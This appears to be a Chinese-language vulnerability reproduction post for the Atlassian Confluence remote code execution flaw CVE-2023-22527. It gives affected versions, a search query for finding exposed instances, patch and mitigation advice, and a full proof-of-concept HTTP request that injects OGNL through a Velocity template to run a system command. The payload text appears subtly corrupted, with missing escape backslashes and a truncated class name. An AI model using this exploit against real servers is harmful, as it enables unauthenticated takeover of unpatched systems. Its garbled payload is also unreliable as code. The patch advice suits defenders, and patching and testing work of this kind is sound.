免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
漏洞名称
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
漏洞评分
10.0(严重)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
漏洞详情
旧版本的 Confluence Data Center and Server 上存在一个模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现 RCE。
影响产品
Confluence Data Center and Server 8.0.x
Confluence Data Center and Server 8.1.x
Confluence Data Center and Server 8.2.x
Confluence Data Center and Server 8.3.x
Confluence Data Center and Server 8.4.x
8.5.0 <= Confluence Data Center and Server <= 8.5.3
漏洞复现
app="Atlassian-Confluence"
1.系统页面:
2.poc
POST /template/aui/text-inline.vm HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&x= .apache.struts2.ServletActionContext ().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
修复建议
补丁文件
补丁名称:
Atlassian Confluence远程代码执行漏洞—Atlassian建议修补到最新版本或固定的 LTS 版本,需登录
公告链接:
https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
补丁链接:
https://support.atlassian.com/
其他修复方法
目前官方已发布安全更新,受影响用户可以更新到最新版本。
Confluence Data Center and Server >=8.5.4
Confluence Data Center >=8.6.0
Confluence Data Center >=8.7.1
缓解方案
仅允许受信任网络访问
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论